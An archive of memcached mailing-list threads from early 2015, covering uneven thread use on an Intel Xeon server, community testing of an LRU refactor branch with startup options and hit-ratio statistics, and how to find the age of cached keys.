Re: Memcached odd behaviour on intel xeon E5-4610

2015-02-09 Thread dormando
 I am running some tests using memached 1.4.22 over an Intel Xeon E5 (4 
 sockets with 8 core each, 2 Hyper threads per core, and 4 NUMA nodes) and 
 running Ubuntu trusty. I compiled memcached with gcc-4.8.2 with default 
 CFLAGS and configuration options.

 The problem is whenever I start memcached with odd number of server threads 
 (3,5,7,9,11,..) everything is ok, and all threads are engaging in
 processing requests, the status of all threads are Running. However, if I 
 start the server with even number of threads (2,4,6,8,..), half of the
 threads are always in sleep mode and do not engage in servicing clients. This 
 is related to memached, as memaslap, for example, is running with no
 such pattern. I ran the exact test on an AMD Opteron and things are ok with 
 memached. So my question is: is there any specific tuning required for
 Intel machines? Is there any specific flag or some part of the code that 
 might cause worker threads to not engage?


 Thanks,
 Saman

That is pretty weird. I've not run it on a quad socket but plenty of intel
machines without problem. Modern ones too.

How many clients are you telling memslap to use? Can you try
https://github.com/dormando/mc-crusher quickly? (run loadconf/similar to
load some values, then a different one to hammer it).

Connections are dispersed via thread.c:dispatch_conn_new()

int tid = (last_thread + 1) % settings.num_threads;

LIBEVENT_THREAD *thread = threads + tid;

last_thread = tid;

which is pretty simple at the base.

If you can gdb up can you dump the per-thread stats structures? that will
show definitively if those threads ever get work or not.

Re: memory efficiency / LRU refactor branch

2015-01-20 Thread dormando
Can probably get rid of that since I added the juggles stat. and/or
rename it to maintainer_runs or something... was useful to see if I'd hung
the thread.

On Tue, 20 Jan 2015, Eric McConville wrote:

 This is more of a comment, but I noticed when debugging w/ running the 
 lru_maintainer option under extreme verbosity (-vvv), I get an endless
 running/sleeping message.

     ~ ./memcached -vvv -o lru_maintainer
     // ... slab start-up ...
     LRU maintainer thread running
     LRU maintainer thread sleeping
     LRU maintainer thread running
     LRU maintainer thread sleeping
     LRU maintainer thread running
     LRU maintainer thread sleeping
     // ... endless...

 Expected, but a bit annoying

 On Tue, Jan 20, 2015 at 12:37 AM, dormando dorma...@rydia.net wrote:
   Thanks!

   No crashes is interesting/useful at least? No errors or other problems?

   I'm still hoping someone can side-by-side in production with the
   recommended settings. I can come up with synthetic tests all day and it
   doesn't educate in the same way.

   On Tue, 20 Jan 2015, Zhiwei Chan wrote:

test result:
  I run this test last night, the result as following:
1. environment:
[root@jason3 code]# lsb_release -a
LSB Version:
   
   
 :base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch
Distributor ID: CentOS
Description: CentOS release 6.5 (Final)
Release: 6.5
Codename: Final
[root@jason3 code]# free
             total       used       free     shared    buffers     
 cached
Mem:       8003888    3434536    4569352          0     263324    
 1372600
-/+ buffers/cache:    1798612    6205276
Swap:      8142840      11596    8131244
[root@jason3 code]# cat /proc/cpuinfo 
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 58
model name : Intel(R) Xeon(R) CPU E3-1225 V2 @ 3.20GHz
stepping : 9
cpu MHz : 1600.000
cache size : 8192 KB
 4 core.
   
2. running option:
[root@jason3 code]# ps -ef|grep memcached-
root      7898     1 11 Jan19 ?        02:12:46 ./memcached-master -c 
 10240 -o tail_repair_time=7200 -m 64 -u root -p 3 -d
root      8092     1 11 Jan19 ?        02:11:22 ./memcached-lrurework 
 -d -c 10240 -o lru_maintainer lru_crawler -m 64 -u root -p
   4
root     10265  9447  0 11:30 pts/1    00:00:00 grep memcached-
root     10325     1 11 Jan19 ?        02:06:14 ./memcached-release 
 -d -c 10240 -m 64 -u root -p 5 -o slab_reassign lru_crawler
   slab_automove=3
release_mem_sleep=1 release_mem_start=40 release_mem_stop=80 
 lru_crawler_interval=3600
  
memcached-master : the most update memcached of master branch. with 
 port 3
memcached-lrurework: the most update lrurework branch of dormado's 
 memcached, with port 4
memcached-release: the most update master branch + release memory 
 path. with port 5
   
3. What is the traffic mode?
  It simulates the traffic distribution of one of our pools, with the 
 expire-time and value-length distribution as following:
#the expire of keys
expire_time         = [1,5,10,30,60,300,600,3600,86400,0]
expire_time_weight  = [1,1, 2, 5, 8,  5,  6,   5,    3,1]
   
#the len of value
value_len         = [4,10,50,100,200,500,1000,2000,5000,1]
value_len_weight  = [3, 4, 5,  8,  8, 10,   5,   5,   2,    1]
   
Using the the python script compare_test.pyto excute: python 
 ./compare_test.py
   192.168.116.213:3,192.168.116.213:4,192.168.116.213:5
   
I run the test process on the machine that run memcached process, so 
 that it is easy to get heavy workload.
   
I got a test result of last 12 hours, watch at Cacti. it seems that 
 there is no different for this traffic mode.
gets/sets = 9:1
hit_rate ~ 50%
  [IMAGE]
  I also print some detail statistics info in the test script:
 
  ​Cache list: ['192.168.116.213:3', '192.168.116.213:4', 
  '192.168.116.213:5']
  send_key_number: 127306   ---unique keys number
  test_loop: 0   ---loop forever, no limit
  weight of get/set command: [10, 1]   -- the weight of get/set 
  command. Note: if get a key miss, it will set the key immediately,
 not count
  into this weight.
  show_interval: 10    ---the interval of showing statistics info.
  stats_interval: 5      ---the interval of getting the stats of memcached.
  show_stats_interval:[60, 3600, 43200]   ---the time-range of 
  showing in second. e.g. 60 means last 60s, and 3600 means last
 3600s
  len of keys: [4, 10, 50, 100, 200, 500, 1000, 2000, 5000, 1]  
  possible

Re: memory efficiency / LRU refactor branch

2015-01-19 Thread dormando
: 12405356058, OOMs:   0, evict:
 359460
   192.168.116.213:5
 [60s] gets:   523093, hit:  49%, updates:    52116, dels:        0, items:   
 28/69396, read: 52993446, write: 215231210, OOMs:   0, evict:  6491
 [3600s] gets: 29669464, hit:  49%, updates:  2961988, dels:        0, items:  
 -25/69396, read: 3038356827, write: 12219764097, OOMs:   0, evict:
 355644
 ...



 On Fri, Jan 16, 2015 at 9:29 PM, Zhiwei Chan z.w.chan.ja...@gmail.com wrote:
     Our maintain team trend to be conservative, especially on the basic 
 software relative to performance. so I think it is rare possible
   to post it to the production recently. But I write a pretty convenient 
 tools in Python for an A/B test. The tool can fake traffic of
   random expire-time and random length, and also can specify the weights 
 of different expire-time and length, and lots of other
   functions. It is almost completed, and I can post a result next Monday. 

 On Fri, Jan 16, 2015 at 11:12 AM, dormando dorma...@rydia.net wrote:
   If you want?

   What would make you confident enough to try the branch in production? Or
   do you rely on your other patches and that's not really possible?

   On Thu, 15 Jan 2015, Zhiwei Chan wrote:

  I try to use real traffic of application to make a compare test, 
 but it seems that not all of guys use the cache-client with
   consistent hash in
dev environment. The result is that the traffic is not distributed 
 well as I supposed. 
  Should I fake the traffic and make a compare test instead of real 
 traffic?  e.g., fake the random expire-time keys traffic to
   set and get for
memcached.
   
---
host mc56 installs the most update LRU-rework branch's memcached with 
 option likes /usr/local/bin/memcached -u nobody -d -c
   10240 -o
lru_maintainer lru_crawler -m 64 -p 11811;
host mc57 install the version 1.4.20_7_gb118a6c's memcached, with 
 option likes /usr/bin/memcached -u nobody -d -c 10240 -o
   tail_repair_time=7200
-m 64 -p 11811,
   
I sum up the stats of all  memcache instances on the host and make 
 followings analysis: 
   
Inline image 1
   
On Wed, Jan 14, 2015 at 1:58 AM, dormando dorma...@rydia.net wrote:
          Last update to the branch was 3 days ago. I'm not planning on 
 doing any
          more work on it at the moment, so people have a chance to test 
 it.
   
          thanks!
   
          On Tue, 13 Jan 2015, Zhiwei Chan wrote:
   
           I compile directly using your branch on the test server, and 
 please tell me if it need update and re-compile.
          
           On Tue, Jan 13, 2015 at 4:20 AM, dormando 
 dorma...@rydia.net wrote:
                 That sounds like an okay place to start. Can you please 
 make sure the
                 other dev server is running the very latest version of 
 the branch? A lot
                 changed since last friday... a few pretty bad bugs.
          
                 Please use the startup options described in the middle 
 of the PR.
          
                 If anyone's brave enough to try the latest branch on 
 one production
                 instance (if they have a low traffic one somewhere, 
 maybe?) that'd be
                 good. I ran the branch under a load tester for a few 
 hours, it passes
                 tests, etc. If I merge it, it'll just go into people's 
 productions without
                 ever having a production test first, so hopefully 
 someone can try it?
          
                 thanks
          
                 On Mon, 12 Jan 2015, Zhiwei Chan wrote:
          
                    I have run it since last Friday, so far no crash. 
 As I have finished the haproxy works today, I will try a
   compare test for
          this
                 LRU works
                  tomorrow as following:    There are two 
 servers(Centos 5.8, 8cores, 8G memory) in the dev environment, Both of
   server run 32
                 memcached
                  instances(processes) with maxmum memory of 128M. One 
 server runs version 1.4.21, the other runs this branch.
   There are lots
          of
                 pools using these
                  memcached server, and all of pools use tow memcached 
 instances on different server. The client of pools use
   Consistent Hash
          algorithm
                 to distribute
                  keys to their 2 memcached instances. I will watch the 
 hit-rate and other performance using Cacti.
                    I think it will work, but usually there is not much 
 traffic in our dev environment.  Please tell me if any
   other advice.
                    
                 
                  2015-01-08 4:21 GMT+08

Re: memory efficiency / LRU refactor branch

2015-01-15 Thread dormando
If you want?

What would make you confident enough to try the branch in production? Or
do you rely on your other patches and that's not really possible?

On Thu, 15 Jan 2015, Zhiwei Chan wrote:

   I try to use real traffic of application to make a compare test, but it 
 seems that not all of guys use the cache-client with consistent hash in
 dev environment. The result is that the traffic is not distributed well as I 
 supposed. 
   Should I fake the traffic and make a compare test instead of real traffic?  
 e.g., fake the random expire-time keys traffic to set and get for
 memcached.

 ---
 host mc56 installs the most update LRU-rework branch's memcached with option 
 likes /usr/local/bin/memcached -u nobody -d -c 10240 -o
 lru_maintainer lru_crawler -m 64 -p 11811;
 host mc57 install the version 1.4.20_7_gb118a6c's memcached, with option 
 likes /usr/bin/memcached -u nobody -d -c 10240 -o tail_repair_time=7200
 -m 64 -p 11811,

 I sum up the stats of all  memcache instances on the host and make followings 
 analysis: 

 Inline image 1

 On Wed, Jan 14, 2015 at 1:58 AM, dormando dorma...@rydia.net wrote:
   Last update to the branch was 3 days ago. I'm not planning on doing any
   more work on it at the moment, so people have a chance to test it.

   thanks!

   On Tue, 13 Jan 2015, Zhiwei Chan wrote:

I compile directly using your branch on the test server, and please 
 tell me if it need update and re-compile.
   
On Tue, Jan 13, 2015 at 4:20 AM, dormando dorma...@rydia.net wrote:
          That sounds like an okay place to start. Can you please make 
 sure the
          other dev server is running the very latest version of the 
 branch? A lot
          changed since last friday... a few pretty bad bugs.
   
          Please use the startup options described in the middle of the 
 PR.
   
          If anyone's brave enough to try the latest branch on one 
 production
          instance (if they have a low traffic one somewhere, maybe?) 
 that'd be
          good. I ran the branch under a load tester for a few hours, it 
 passes
          tests, etc. If I merge it, it'll just go into people's 
 productions without
          ever having a production test first, so hopefully someone can 
 try it?
   
          thanks
   
          On Mon, 12 Jan 2015, Zhiwei Chan wrote:
   
             I have run it since last Friday, so far no crash. As I have 
 finished the haproxy works today, I will try a compare test for
   this
          LRU works
           tomorrow as following:    There are two servers(Centos 5.8, 
 8cores, 8G memory) in the dev environment, Both of server run 32
          memcached
           instances(processes) with maxmum memory of 128M. One server 
 runs version 1.4.21, the other runs this branch. There are lots
   of
          pools using these
           memcached server, and all of pools use tow memcached 
 instances on different server. The client of pools use Consistent Hash
   algorithm
          to distribute
           keys to their 2 memcached instances. I will watch the 
 hit-rate and other performance using Cacti.
             I think it will work, but usually there is not much traffic 
 in our dev environment.  Please tell me if any other advice.
             
          
           2015-01-08 4:21 GMT+08:00 dormando dorma...@rydia.net:
                 Hey,
          
                 To all three of you: Just run it anywhere you can (but 
 not more than one
                 machine, yet?), with the options prescribed in the PR. 
 Ideally you have
                 graphs of the hit ratio and maybe cache fullness and 
 can compare
                 before/after.
          
                 And let me know if it hangs or crashes, obviously. If 
 so a backtrace
                 and/or coredump would be fantastic.
          
                 On Thu, 8 Jan 2015, Zhiwei Chan wrote:
          
                    I will deploy it to one of our test environment on 
 CentOS 5.8, for a comparison test with the 1.4.21,  although the
          workloads is
                 not as heavy as
                  product environment. Tell me if any I could help.
                 
                  2015-01-07 23:30 GMT+08:00 Eric McConville 
 erichasem...@gmail.com:
                        Same here. Do you want any findings posted to 
 the mailing list, or the PU thread?
                 
                  On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh 
 m...@ryanmccullagh.com wrote:
                        I'm willing to help out in any way possible. 
 What can I do?
                 
                        -Original Message-
                        From: memcached@googlegroups.com 
 [mailto:memcached

Re: memory efficiency / LRU refactor branch

2015-01-13 Thread dormando
Last update to the branch was 3 days ago. I'm not planning on doing any
more work on it at the moment, so people have a chance to test it.

thanks!

On Tue, 13 Jan 2015, Zhiwei Chan wrote:

 I compile directly using your branch on the test server, and please tell me 
 if it need update and re-compile.

 On Tue, Jan 13, 2015 at 4:20 AM, dormando dorma...@rydia.net wrote:
   That sounds like an okay place to start. Can you please make sure the
   other dev server is running the very latest version of the branch? A lot
   changed since last friday... a few pretty bad bugs.

   Please use the startup options described in the middle of the PR.

   If anyone's brave enough to try the latest branch on one production
   instance (if they have a low traffic one somewhere, maybe?) that'd be
   good. I ran the branch under a load tester for a few hours, it passes
   tests, etc. If I merge it, it'll just go into people's productions 
 without
   ever having a production test first, so hopefully someone can try it?

   thanks

   On Mon, 12 Jan 2015, Zhiwei Chan wrote:

  I have run it since last Friday, so far no crash. As I have 
 finished the haproxy works today, I will try a compare test for this
   LRU works
tomorrow as following:    There are two servers(Centos 5.8, 8cores, 
 8G memory) in the dev environment, Both of server run 32
   memcached
instances(processes) with maxmum memory of 128M. One server runs 
 version 1.4.21, the other runs this branch. There are lots of
   pools using these
memcached server, and all of pools use tow memcached instances on 
 different server. The client of pools use Consistent Hash algorithm
   to distribute
keys to their 2 memcached instances. I will watch the hit-rate and 
 other performance using Cacti.
  I think it will work, but usually there is not much traffic in our 
 dev environment.  Please tell me if any other advice.
  
   
2015-01-08 4:21 GMT+08:00 dormando dorma...@rydia.net:
          Hey,
   
          To all three of you: Just run it anywhere you can (but not more 
 than one
          machine, yet?), with the options prescribed in the PR. Ideally 
 you have
          graphs of the hit ratio and maybe cache fullness and can compare
          before/after.
   
          And let me know if it hangs or crashes, obviously. If so a 
 backtrace
          and/or coredump would be fantastic.
   
          On Thu, 8 Jan 2015, Zhiwei Chan wrote:
   
             I will deploy it to one of our test environment on CentOS 
 5.8, for a comparison test with the 1.4.21,  although the
   workloads is
          not as heavy as
           product environment. Tell me if any I could help.
          
           2015-01-07 23:30 GMT+08:00 Eric McConville 
 erichasem...@gmail.com:
                 Same here. Do you want any findings posted to the 
 mailing list, or the PU thread?
          
           On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh 
 m...@ryanmccullagh.com wrote:
                 I'm willing to help out in any way possible. What can I 
 do?
          
                 -Original Message-
                 From: memcached@googlegroups.com 
 [mailto:memcached@googlegroups.com] On
                 Behalf Of dormando
                 Sent: Wednesday, January 7, 2015 3:52 AM
                 To: memcached@googlegroups.com
                 Subject: memory efficiency / LRU refactor branch
          
                 Yo,
          
                 https://github.com/memcached/memcached/pull/97
          
                 Opening to a wider audience. I need some folks willing 
 to poke at it and see
                 if their workloads fair better or worse with respect to 
 hit ratios.
          
                 The rest of the work remaining on my end is more 
 testing, and some TODO's
                 noted in the PR. The remaining work is relatively small 
 aside from the page
                 mover idea. It hasn't been crashing or hanging in my 
 testing so far, but
                 that might still happen.
          
                 I can't/won't merge this until I get some evidence that 
 it's useful.
                 Hoping someone out there can lend a hand. I don't know 
 what the actual
                 impact would be, but for some workloads it could be 
 large. Even for folks
                 who have set all items to never expire, it could still 
 potentially improve
                 hit ratios by better protecting active items.
          
                 It will work best if you at least have a mix of items 
 with TTL's that expire
                 in reasonable amounts of time.
          
                 thanks

Re: Is there a where to work out when the key was written to memcache and calculate the age of the oldest key on our memcache?

2015-01-12 Thread dormando
The only data stored are when the item expires, and when the last time it
was accessed.

The age field (and evicted_time) is how long ago the oldest item in the
LRU was accessed. You can roughly tell how wide your LRU is with that.

On Mon, 12 Jan 2015, 'Jay Grizzard' via memcached wrote:

 I don’t think there’s a way to figure out when a given key was written. If 
 you really needed that, you could write it as part of the data you
 stored, or use the ‘flags’ field to store a unixtime timestamp.
 You can get the age of the oldest key, on a per-slab basis, with ‘stats 
 items’ and looking at the ‘age’ field. If you want the overall oldest age,
 you’ll have to find the oldest age value amongst all the slabs.

 Do note, though, that if you have evictions going on, ‘oldest’ is kind of 
 dubious, if you’re trying to use it as a “anything newer than this
 exists”, since evictions happen in lru order and per-slab, so younger items 
 can disappear before older ones, if they’re in a different slab or have
 been accessed more recently. (Don’t know if that’s what you’re doing, but 
 just in case you are…)

 -j


 On Mon, Jan 12, 2015 at 9:34 AM, Gurdipe Dosanjh gurd...@veeqo.com wrote:
   Hi All,

 I am new  to memcache and need to know is there a where to work out when the 
 key was written to memcache and calculate the age of the oldest
 key on our memcache?

 Kind Regards

 Gurdipe

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.


 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



Re: memory efficiency / LRU refactor branch

2015-01-12 Thread dormando
That sounds like an okay place to start. Can you please make sure the
other dev server is running the very latest version of the branch? A lot
changed since last friday... a few pretty bad bugs.

Please use the startup options described in the middle of the PR.

If anyone's brave enough to try the latest branch on one production
instance (if they have a low traffic one somewhere, maybe?) that'd be
good. I ran the branch under a load tester for a few hours, it passes
tests, etc. If I merge it, it'll just go into people's productions without
ever having a production test first, so hopefully someone can try it?

thanks

On Mon, 12 Jan 2015, Zhiwei Chan wrote:

   I have run it since last Friday, so far no crash. As I have finished the 
 haproxy works today, I will try a compare test for this LRU works
 tomorrow as following:    There are two servers(Centos 5.8, 8cores, 8G 
 memory) in the dev environment, Both of server run 32 memcached
 instances(processes) with maxmum memory of 128M. One server runs version 
 1.4.21, the other runs this branch. There are lots of pools using these
 memcached server, and all of pools use tow memcached instances on different 
 server. The client of pools use Consistent Hash algorithm to distribute
 keys to their 2 memcached instances. I will watch the hit-rate and other 
 performance using Cacti.
   I think it will work, but usually there is not much traffic in our dev 
 environment.  Please tell me if any other advice.
   

 2015-01-08 4:21 GMT+08:00 dormando dorma...@rydia.net:
   Hey,

   To all three of you: Just run it anywhere you can (but not more than one
   machine, yet?), with the options prescribed in the PR. Ideally you have
   graphs of the hit ratio and maybe cache fullness and can compare
   before/after.

   And let me know if it hangs or crashes, obviously. If so a backtrace
   and/or coredump would be fantastic.

   On Thu, 8 Jan 2015, Zhiwei Chan wrote:

  I will deploy it to one of our test environment on CentOS 5.8, for 
 a comparison test with the 1.4.21,  although the workloads is
   not as heavy as
product environment. Tell me if any I could help.
   
2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com:
          Same here. Do you want any findings posted to the mailing list, 
 or the PU thread?
   
On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh 
 m...@ryanmccullagh.com wrote:
          I'm willing to help out in any way possible. What can I do?
   
          -Original Message-
          From: memcached@googlegroups.com 
 [mailto:memcached@googlegroups.com] On
          Behalf Of dormando
          Sent: Wednesday, January 7, 2015 3:52 AM
          To: memcached@googlegroups.com
          Subject: memory efficiency / LRU refactor branch
   
          Yo,
   
          https://github.com/memcached/memcached/pull/97
   
          Opening to a wider audience. I need some folks willing to poke 
 at it and see
          if their workloads fair better or worse with respect to hit 
 ratios.
   
          The rest of the work remaining on my end is more testing, and 
 some TODO's
          noted in the PR. The remaining work is relatively small aside 
 from the page
          mover idea. It hasn't been crashing or hanging in my testing so 
 far, but
          that might still happen.
   
          I can't/won't merge this until I get some evidence that it's 
 useful.
          Hoping someone out there can lend a hand. I don't know what the 
 actual
          impact would be, but for some workloads it could be large. Even 
 for folks
          who have set all items to never expire, it could still 
 potentially improve
          hit ratios by better protecting active items.
   
          It will work best if you at least have a mix of items with 
 TTL's that expire
          in reasonable amounts of time.
   
          thanks,
          -Dormando
   
--
   
---
You received this message because you are subscribed to the Google 
 Groups memcached group.
To unsubscribe from this group and stop receiving emails from it, 
 send an email to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
   
   
--
   
---
You received this message because you are subscribed to the Google 
 Groups memcached group.
To unsubscribe from this group and stop receiving emails from it, 
 send an email to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
   
   
--
   
---
You received this message because you are subscribed to the Google 
 Groups memcached group.
To unsubscribe from this group and stop receiving emails

Re: memory efficiency / LRU refactor branch

2015-01-08 Thread dormando
Hi,

https://github.com/memcached/memcached/pull/97

I've been poking at the TODO list since originally posting and fixed a
number of bugs. I'm taking some extra time to think about the slab
rebalancer situation and will be doing more testing than coding from now
on.

Hoping to get some of you folks involved in testing. I'll give it a good
soak before merging. Please and thanks!

On Wed, 7 Jan 2015, dormando wrote:

 Hey,

 To all three of you: Just run it anywhere you can (but not more than one
 machine, yet?), with the options prescribed in the PR. Ideally you have
 graphs of the hit ratio and maybe cache fullness and can compare
 before/after.

 And let me know if it hangs or crashes, obviously. If so a backtrace
 and/or coredump would be fantastic.

 On Thu, 8 Jan 2015, Zhiwei Chan wrote:

    I will deploy it to one of our test environment on CentOS 5.8, for a 
  comparison test with the 1.4.21,  although the workloads is not as heavy as
  product environment. Tell me if any I could help.
 
  2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com:
Same here. Do you want any findings posted to the mailing list, or 
  the PU thread?
 
  On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com 
  wrote:
I'm willing to help out in any way possible. What can I do?
 
-Original Message-
From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] 
  On
Behalf Of dormando
Sent: Wednesday, January 7, 2015 3:52 AM
To: memcached@googlegroups.com
Subject: memory efficiency / LRU refactor branch
 
Yo,
 
https://github.com/memcached/memcached/pull/97
 
Opening to a wider audience. I need some folks willing to poke at it 
  and see
if their workloads fair better or worse with respect to hit ratios.
 
The rest of the work remaining on my end is more testing, and some 
  TODO's
noted in the PR. The remaining work is relatively small aside from 
  the page
mover idea. It hasn't been crashing or hanging in my testing so far, 
  but
that might still happen.
 
I can't/won't merge this until I get some evidence that it's useful.
Hoping someone out there can lend a hand. I don't know what the actual
impact would be, but for some workloads it could be large. Even for 
  folks
who have set all items to never expire, it could still potentially 
  improve
hit ratios by better protecting active items.
 
It will work best if you at least have a mix of items with TTL's that 
  expire
in reasonable amounts of time.
 
thanks,
-Dormando
 
  --
 
  ---
  You received this message because you are subscribed to the Google Groups 
  memcached group.
  To unsubscribe from this group and stop receiving emails from it, send an 
  email to memcached+unsubscr...@googlegroups.com.
  For more options, visit https://groups.google.com/d/optout.
 
 
  --
 
  ---
  You received this message because you are subscribed to the Google Groups 
  memcached group.
  To unsubscribe from this group and stop receiving emails from it, send an 
  email to memcached+unsubscr...@googlegroups.com.
  For more options, visit https://groups.google.com/d/optout.
 
 
  --
 
  ---
  You received this message because you are subscribed to the Google Groups 
  memcached group.
  To unsubscribe from this group and stop receiving emails from it, send an 
  email to memcached+unsubscr...@googlegroups.com.
  For more options, visit https://groups.google.com/d/optout.
 
 

RE: memory efficiency / LRU refactor branch

2015-01-08 Thread dormando
The latest commits document the new statistics counters. If there're other
that might be interesting let me know.

Mainly to compare before/after you only really need to look at the hit
ratio. If your dataset is large enough to push items through cache, this
is where the improvements start.

Otherwise uh... if it actually functions that's good to know an generally
obvious to monitor (non-corrupt data, doesn't crash).

On Thu, 8 Jan 2015, Ryan McCullagh wrote:

 Hi,

 I'm going to be using your lru_rework branch on my development machines 
 starting tonight.

 I'm looking for some ways to monitor it?

 -Original Message-
 From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On 
 Behalf Of dormando
 Sent: Thursday, January 8, 2015 9:25 PM
 To: memcached@googlegroups.com
 Subject: Re: memory efficiency / LRU refactor branch

 Hi,

 https://github.com/memcached/memcached/pull/97

 I've been poking at the TODO list since originally posting and fixed a number 
 of bugs. I'm taking some extra time to think about the slab rebalancer 
 situation and will be doing more testing than coding from now on.

 Hoping to get some of you folks involved in testing. I'll give it a good soak 
 before merging. Please and thanks!

 On Wed, 7 Jan 2015, dormando wrote:

  Hey,
 
  To all three of you: Just run it anywhere you can (but not more than
  one machine, yet?), with the options prescribed in the PR. Ideally you
  have graphs of the hit ratio and maybe cache fullness and can compare
  before/after.
 
  And let me know if it hangs or crashes, obviously. If so a backtrace
  and/or coredump would be fantastic.
 
  On Thu, 8 Jan 2015, Zhiwei Chan wrote:
 
 I will deploy it to one of our test environment on CentOS 5.8, for
   a comparison test with the 1.4.21,  although the workloads is not as 
   heavy as product environment. Tell me if any I could help.
  
   2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com:
 Same here. Do you want any findings posted to the mailing list, or 
   the PU thread?
  
   On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com 
   wrote:
 I'm willing to help out in any way possible. What can I do?
  
 -Original Message-
 From: memcached@googlegroups.com 
   [mailto:memcached@googlegroups.com] On
 Behalf Of dormando
 Sent: Wednesday, January 7, 2015 3:52 AM
 To: memcached@googlegroups.com
 Subject: memory efficiency / LRU refactor branch
  
 Yo,
  
 https://github.com/memcached/memcached/pull/97
  
 Opening to a wider audience. I need some folks willing to poke at 
   it and see
 if their workloads fair better or worse with respect to hit ratios.
  
 The rest of the work remaining on my end is more testing, and some 
   TODO's
 noted in the PR. The remaining work is relatively small aside from 
   the page
 mover idea. It hasn't been crashing or hanging in my testing so 
   far, but
 that might still happen.
  
 I can't/won't merge this until I get some evidence that it's useful.
 Hoping someone out there can lend a hand. I don't know what the 
   actual
 impact would be, but for some workloads it could be large. Even for 
   folks
 who have set all items to never expire, it could still potentially 
   improve
 hit ratios by better protecting active items.
  
 It will work best if you at least have a mix of items with TTL's 
   that expire
 in reasonable amounts of time.
  
 thanks,
 -Dormando
  
   --
  
   ---
   You received this message because you are subscribed to the Google Groups 
   memcached group.
   To unsubscribe from this group and stop receiving emails from it, send an 
   email to memcached+unsubscr...@googlegroups.com.
   For more options, visit https://groups.google.com/d/optout.
  
  
   --
  
   ---
   You received this message because you are subscribed to the Google Groups 
   memcached group.
   To unsubscribe from this group and stop receiving emails from it, send an 
   email to memcached+unsubscr...@googlegroups.com.
   For more options, visit https://groups.google.com/d/optout.
  
  
   --
  
   ---
   You received this message because you are subscribed to the Google Groups 
   memcached group.
   To unsubscribe from this group and stop receiving emails from it, send an 
   email to memcached+unsubscr...@googlegroups.com.
   For more options, visit https://groups.google.com/d/optout.
  
  

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



memory efficiency / LRU refactor branch

2015-01-07 Thread dormando
Yo,

https://github.com/memcached/memcached/pull/97

Opening to a wider audience. I need some folks willing to poke at it and
see if their workloads fair better or worse with respect to hit ratios.

The rest of the work remaining on my end is more testing, and some TODO's
noted in the PR. The remaining work is relatively small aside from the
page mover idea. It hasn't been crashing or hanging in my testing so far,
but that might still happen.

I can't/won't merge this until I get some evidence that it's useful.
Hoping someone out there can lend a hand. I don't know what the actual
impact would be, but for some workloads it could be large. Even for folks
who have set all items to never expire, it could still potentially improve
hit ratios by better protecting active items.

It will work best if you at least have a mix of items with TTL's that
expire in reasonable amounts of time.

thanks,
-Dormando


Re: memory efficiency / LRU refactor branch

2015-01-07 Thread dormando
To be extra clear; you can send feeback here or the PR. I don't care
either way.

On Wed, 7 Jan 2015, dormando wrote:

 Hey,

 To all three of you: Just run it anywhere you can (but not more than one
 machine, yet?), with the options prescribed in the PR. Ideally you have
 graphs of the hit ratio and maybe cache fullness and can compare
 before/after.

 And let me know if it hangs or crashes, obviously. If so a backtrace
 and/or coredump would be fantastic.

 On Thu, 8 Jan 2015, Zhiwei Chan wrote:

    I will deploy it to one of our test environment on CentOS 5.8, for a 
  comparison test with the 1.4.21,  although the workloads is not as heavy as
  product environment. Tell me if any I could help.
 
  2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com:
Same here. Do you want any findings posted to the mailing list, or 
  the PU thread?
 
  On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com 
  wrote:
I'm willing to help out in any way possible. What can I do?
 
-Original Message-
From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] 
  On
Behalf Of dormando
Sent: Wednesday, January 7, 2015 3:52 AM
To: memcached@googlegroups.com
Subject: memory efficiency / LRU refactor branch
 
Yo,
 
https://github.com/memcached/memcached/pull/97
 
Opening to a wider audience. I need some folks willing to poke at it 
  and see
if their workloads fair better or worse with respect to hit ratios.
 
The rest of the work remaining on my end is more testing, and some 
  TODO's
noted in the PR. The remaining work is relatively small aside from 
  the page
mover idea. It hasn't been crashing or hanging in my testing so far, 
  but
that might still happen.
 
I can't/won't merge this until I get some evidence that it's useful.
Hoping someone out there can lend a hand. I don't know what the actual
impact would be, but for some workloads it could be large. Even for 
  folks
who have set all items to never expire, it could still potentially 
  improve
hit ratios by better protecting active items.
 
It will work best if you at least have a mix of items with TTL's that 
  expire
in reasonable amounts of time.
 
thanks,
-Dormando
 
  --
 
  ---
  You received this message because you are subscribed to the Google Groups 
  memcached group.
  To unsubscribe from this group and stop receiving emails from it, send an 
  email to memcached+unsubscr...@googlegroups.com.
  For more options, visit https://groups.google.com/d/optout.
 
 
  --
 
  ---
  You received this message because you are subscribed to the Google Groups 
  memcached group.
  To unsubscribe from this group and stop receiving emails from it, send an 
  email to memcached+unsubscr...@googlegroups.com.
  For more options, visit https://groups.google.com/d/optout.
 
 
  --
 
  ---
  You received this message because you are subscribed to the Google Groups 
  memcached group.
  To unsubscribe from this group and stop receiving emails from it, send an 
